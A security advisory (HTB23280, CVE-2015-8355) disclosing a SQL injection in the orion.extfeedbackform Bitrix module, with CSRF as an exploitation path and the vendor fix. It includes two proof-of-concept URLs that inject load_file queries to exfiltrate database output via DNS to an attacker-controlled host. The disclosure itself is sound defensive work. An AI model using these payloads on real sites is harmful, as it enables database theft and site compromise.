[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

SQL Injection in orion.extfeedbackform Bitrix Module

Advisory ID: HTB23280
Product: orion.extfeedbackform Bitrix module
Vendor: www.orion-soft.ru
Vulnerable Version(s): 2.1.2 and probably prior
Tested Version: 2.1.2
Advisory Publication:  November 18, 2015  [without technical details]
Vendor Notification: November 18, 2015 
Vendor Patch: December 11, 2015 
Public Disclosure: December 16, 2015 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2015-8355
Risk Level: Medium 
CVSSv3 Base Score: 6.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered two vulnerabilities in 
orion.extfeedbackform Bitrix module, can be exploited to execute arbitrary SQL 
queries and obtain potentially sensitive data, modify information in database 
and gain complete control over the vulnerable website.

All discovered vulnerabilities require that the attacker is authorized against 
the website and has access to vulnerable module. However the vulnerabilities 
can be also exploited via CSRF, since the web application does not check origin 
of received requests. This means, that a remote anonymous attacker can create a 
page with CSRF exploit, trick victim to visit this page and execute arbitrary 
SQL queries in database of vulnerable website. 

The vulnerability exists due to insufficient filtration of input data passed 
via the "order" and "by" HTTP GET parameters to 
"/bitrix/admin/orion.extfeedbackform_efbf_forms.php" script. A remote 
authenticated attacker can manipulate SQL queries by injecting arbitrary SQL 
code.

Below are two exploits for each vulnerable parameter. They are based on DNS 
Exfiltration technique and may be used if the database of the vulnerable 
application is hosted on a Windows system. The PoC will send a DNS request 
demanding IP address for `version()` (or any other sensitive output from the 
database) subdomain of ".attacker.com" (a domain name, DNS server of which is 
controlled by the attacker).

"order":

http://[host]/bitrix/admin/orion.extfeedbackform_efbf_forms.php?by=ID,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,
 
%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,
 CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29, 
CHAR%28111%29,CHAR%28109%29,CHAR%2892%29, 
CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29, 
CHAR%28114%29%29%29%29+--+

"by":

http://[host]/bitrix/admin/orion.extfeedbackform_efbf_forms.php?order=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,
 
%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,
 CHAR%28101%29,CHAR%28114%29,CHAR%2846%29, 
CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29, 
CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29, 
CHAR%28114%29%29%29%29+--+

-----------------------------------------------------------------------------------------------

Solution:

Update to orion.extfeedbackform 2.1.3

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23280 - 
https://www.htbridge.com/advisory/HTB23280 - SQL Injection in 
orion.extfeedbackform Bitrix module
[2] orion.extfeedbackform - 
https://marketplace.1c-bitrix.ru/solutions/orion.extfeedbackform/ - Bitrix 
module for feedback forms.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.